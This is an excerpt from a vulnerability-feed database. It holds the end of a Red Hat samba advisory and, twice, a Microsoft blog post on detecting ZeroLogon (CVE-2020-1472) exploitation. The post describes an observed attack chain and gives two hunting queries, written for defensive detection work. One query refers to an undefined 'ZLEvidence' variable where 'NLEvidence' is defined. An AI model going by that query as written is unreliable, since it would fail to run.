acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* The 'require_membership_of' documentation in pam_winbind manpage is incorrect (BZ#1853272)\n\n* Malfunctioning %U substitution in valid users option (BZ#1868917)\n\n* Regression: smbd and nmbd are restarted when samba-winbind package is upgraded (BZ#1878205)\n\n* winbindd memory leak on wbinfo -u with security=ADS (BZ#1892313)", "modified": "2020-12-15T15:17:55", "published": "2020-12-15T14:01:31", "id": "RHSA-2020:5439", "href": "https://access.redhat.com/errata/RHSA-2020:5439", "type": "redhat", "title": "(RHSA-2020:5439) Moderate: samba security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2020-12-02T21:51:37", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. [Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>) along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.\n\n## Here is a sneak peek into our detection lifecycle\n\nWhenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.\n\nOver the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even if we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.\n\nThis lack of activity changed on September 13, when we triggered a surge in alerts. Simultaneously, this increase in activity was followed by the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.\n\n\n\n_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_\n\nMicrosoft Defender for Identity can detect this vulnerability early on. It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.\n\n\n\n_Figure 2: Alert page experience_\n\nWith this Microsoft Defender for Identity alert, you will be able to identify:\n\n * The device that attempted the impersonation.\n * The domain controller.\n * The targeted asset.\n * Whether the impersonation attempts were successful.\n\nFinally, customers using [Microsoft 365 Defende](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>)r can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint.](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.\n\n## A close look at some of the earliest ZeroLogon attacks\n\nZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity was originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.\n\n\n\n_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale_\n\nOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.\n\nUsing the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoints.\n\n\n\n## Hunting for ZeroLogon in Microsoft 365 Defender\n\nCombining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&amp;CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.\n\n\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n`// Find all Netlogon exploit attempt alerts containing source devices \nlet queryWindow = 3d; \nAlertInfo \n| where Timestamp > ago(queryWindow) \n| where ServiceSource == \"Azure ATP\" \n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\" \n| join (AlertEvidence \n| where Timestamp > ago(queryWindow) \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n) on AlertId \n| summarize by AlertId, DeviceId, Timestamp`\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n`// Find potential endpoint Netlogon exploit evidence from AlertId \nlet NLAlertId = \"insert alert ID here\"; \nlet lookAhead = 1m; \nlet lookBehind = 6m; \nlet NLEvidence = AlertEvidence \n| where AlertId == NLAlertId \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId; \nlet sourceMachine = NLEvidence | distinct DeviceId; \nlet alertTime = todatetime(toscalar(ZLEvidence | distinct Timestamp)); \nDeviceNetworkEvents \n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead)) \n| where DeviceId in (sourceMachine) \n| where RemotePort == 135 or RemotePort between (49670 .. 49680) \n| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl \n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl`\n\nThis query can return a result that looks like this:\n\n\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance ](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from[ the threat analytics article ](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsecuritycenter.windows.com%2Fthreatanalytics3%2Fc57607da-fb94-43f3-b8ba-1acda0242900%2Fanalystreport&data=02%7C01%7CDaniel.Naim%40microsoft.com%7C5a14a796515d428cb11608d86545b735%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637370697507756901&sdata=uxd2wKhtSyqr9A2dqhO9D7YW%2F7MgA%2F3o1WnmWjpmCO8%3D&reserved=0>)available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community ](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>)for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "modified": "2020-11-30T17:00:20", "published": "2020-11-30T17:00:20", "id": "MMPC:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/", "type": "mmpc", "title": "Zerologon is now detected by Microsoft Defender for Identity", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-12-02T21:36:53", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0604", "CVE-2020-0796", "CVE-2020-1472"], "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want to provide you with the best detection coverage possible for your domain controllers. [Microsoft Defender for Identity](<https://www.microsoft.com/en-us/microsoft-365/security/identity-defender>) along with other [Microsoft 365 Defender](<https://aka.ms/m365d>) solutions detect adversaries as they try to exploit this vulnerability against your domain controllers.\n\n## Here is a sneak peek into our detection lifecycle\n\nWhenever a vulnerability or attack surface is disclosed, our research teams immediately investigate exploits and produce various methods for detecting attacks. This is highlighted in our response to suspected [WannaCry](<https://docs.microsoft.com/en-us/defender-for-identity/compromised-credentials-alerts#suspected-wannacry-ransomware-attack-external-id-2035>) attacks and with the alert for [Suspected SMB (Server Message Block) packet manipulation](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/lateral-movement-alerts#suspected-smb-packet-manipulation-cve-2020-0796-exploitation---preview-external-id-2406>) (CVE-2020-0796 exploitation). These detection methods are tested in our lab environment, and experimental detectors are deployed to Microsoft Defender for Identity to assess performance and accuracy and find possible attacker activity.\n\nOver the past two months since CVE-2020-1472 was first disclosed, interest in this detection rapidly increased. This happened even if we did not observe any activity matching exploitation of this vulnerability in the initial weeks after the August security updates. It generally takes a while before disclosed vulnerabilities are successfully reverse-engineered and corresponding mechanisms are built.\n\nThis lack of activity changed on September 13, when we triggered a surge in alerts. Simultaneously, this increase in activity was followed by the publication of several proof-of-concept tools and demo exploits that can leverage the vulnerability.\n\n\n\n_Figure 1: Orgs with ZeroLogon exploitation attempts by red teams and real attackers starting September 13, 2020_\n\nMicrosoft Defender for Identity can detect this vulnerability early on. It covers both the aspects of exploitation and traffic inspection of the Netlogon channel.\n\n\n\n_Figure 2: Alert page experience_\n\nWith this Microsoft Defender for Identity alert, you will be able to identify:\n\n * The device that attempted the impersonation.\n * The domain controller.\n * The targeted asset.\n * Whether the impersonation attempts were successful.\n\nFinally, customers using [Microsoft 365 Defende](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>)r can take full advantage of the power of the signals and alerts from Microsoft Defender for Identity, combined with behavioral events and detections from [Microsoft Defender for Endpoint.](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) This coordinated protection enables you not just to observe Netlogon exploitation attempts over network protocols, but also to see device process and file activity associated with the exploitation.\n\n## A close look at some of the earliest ZeroLogon attacks\n\nZeroLogon is a powerful vulnerability for attackers to leverage, but in a normal attack scenario, it will require an initial entry vector inside an organization to facilitate exploitation against domain controllers. During initial monitoring of security signals, [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) observed ZeroLogon exploitation activity in multiple organizations. In many cases, it was clear that the activity was originated from red teams or pen testers using automated vulnerability scanners to locate vulnerable servers. However, Microsoft researchers were also able to identify a few limited cases of real attackers jumping on the ZeroLogon train to expand their perimeter into organizations that, after a month of a patch being available, were still running unpatched domain controllers.\n\n\n\n_Figure 3: Typical Zerologon exploitation activity generated by a vulnerability scanner or a red team testing domain controller at scale_\n\nOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution. Following the web shell installation, this attacker quickly deployed a Cobalt Strike based payload and immediately started exploring the network perimeter and targeting domain controllers found with the ZeroLogon exploit.\n\nUsing the @MsftSecIntel Twitter handle, we [publicly shared some file indicators](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) used during the attack. We also shared the variations of the ZeroLogon exploits we detected, many of which were recompiled versions of well-known, publicly available proof-of-concept code. Microsoft Defender for Endpoint can also detect certain file-based versions of the CVE-2020-1472 exploit when executed on devices protected by Microsoft Defender for Endpoints.\n\n\n\n## Hunting for ZeroLogon in Microsoft 365 Defender\n\nCombining signals from Microsoft Defender for Endpoint with the ZeroLogon alerts from Microsoft Defender for Identity can help assess the nature of the alert quickly. Microsoft 365 Defender automatically leverages signals from both products. It has logic that constantly attempts to combine alerts and events using a variety of correlation logic based on knowledge of cause-effect attack flows, the MITRE ATT&amp;CK framework, and machine learning models.\n\nIn this section, we provide an example (in the simplified form of an [advanced hunting query](<https://docs.microsoft.com/en-gb/microsoft-365/security/mtp/advanced-hunting-overview?view=o365-worldwide>)) of how Microsoft 365 Defender correlation logic operates behind-the-scenes to combine alerts, reducing Security Operations Centers (SOC) fatigue and facilitating investigation.\n\nThe following Microsoft 365 Defender advanced hunting queries identify process and network connection details from the source device suspected to have launched the NetLogon exploit.\n\n\n\nFirst, we gather the relevant details on recent Netlogon exploit attempts from Microsoft Defender for Identity alerts. This will help populate the AlertId for the second query.\n\n`// Find all Netlogon exploit attempt alerts containing source devices \nlet queryWindow = 3d; \nAlertInfo \n| where Timestamp > ago(queryWindow) \n| where ServiceSource == \"Azure ATP\" \n| where Title == \"Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)\" \n| join (AlertEvidence \n| where Timestamp > ago(queryWindow) \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n) on AlertId \n| summarize by AlertId, DeviceId, Timestamp`\n\nNext, populate one AlertId from the prior query into NLAlertId in the next query to hunt for the likely process that launched the exploit and its network connection to the domain controller:\n\n`// Find potential endpoint Netlogon exploit evidence from AlertId \nlet NLAlertId = \"insert alert ID here\"; \nlet lookAhead = 1m; \nlet lookBehind = 6m; \nlet NLEvidence = AlertEvidence \n| where AlertId == NLAlertId \n| where EntityType == \"Machine\" \n| where EvidenceDirection == \"Source\" \n| where isnotempty(DeviceId) \n| summarize Timestamp=arg_min(Timestamp, *) by DeviceId; \nlet sourceMachine = NLEvidence | distinct DeviceId; \nlet alertTime = todatetime(toscalar(ZLEvidence | distinct Timestamp)); \nDeviceNetworkEvents \n| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead)) \n| where DeviceId in (sourceMachine) \n| where RemotePort == 135 or RemotePort between (49670 .. 49680) \n| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl \n| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl`\n\nThis query can return a result that looks like this:\n\n\n\nTying Microsoft Defender for Endpoint data together with the original Microsoft Defender for Identity alert can give a clearer picture as to what happened on the device suspected of launching the exploit. This could save SOC analysts time when investigating alerts, because the relevant details are there to determine if it was caused by a curious researcher or from an actual attack.\n\n## Defend against ZeroLogon\n\nLearn more about the [alert here](<https://docs.microsoft.com/en-us/azure-advanced-threat-protection/compromised-credentials-alerts#suspected-netlogon-privilege-elevation-attempt-cve-2020-1472-exploitationexternalid2411>), along with information on all the alerts Defender for Identity uses to help you stay protected from identity-based attacks.\n\nAlso, feel free to review [our guidance ](<https://support.microsoft.com/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)on managing changes in Netlogon secure channel connections and how you can prevent this vulnerability\n\nCustomers with Microsoft Defender for Endpoint can get additional guidance from[ the threat analytics article ](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsecuritycenter.windows.com%2Fthreatanalytics3%2Fc57607da-fb94-43f3-b8ba-1acda0242900%2Fanalystreport&data=02%7C01%7CDaniel.Naim%40microsoft.com%7C5a14a796515d428cb11608d86545b735%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637370697507756901&sdata=uxd2wKhtSyqr9A2dqhO9D7YW%2F7MgA%2F3o1WnmWjpmCO8%3D&reserved=0>)available in Microsoft Defender Security Center.\n\n## Get started today\n\nAre you just starting your Microsoft Defender for Identity journey? Begin a trial of [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for your organization.\n\nJoin the [Microsoft Defender for Identity Tech Community ](<https://techcommunity.microsoft.com/t5/Azure-Advanced-Threat-Protection/bd-p/AzureAdvancedThreatProtection>)for the latest updates and news about Identity Security Posture Management assessments, detections, and other updates.\n\nTo learn more about Microsoft Security solutions [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [Zerologon is now detected by Microsoft Defender for Identity](<https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/>) appeared first on [Microsoft Security.", "modified": "2020-11-30T17:00:20", "published": "2020-11-30T17:00:20", "id": "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "href": "https://www.microsoft.com/security/blog/2020/11/30/zerologon-is-now-detected-by-microsoft-defender-for-identity/", "type": "mssecure", "title": "Zerologon is now detected by Microsoft Defender for Identity", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}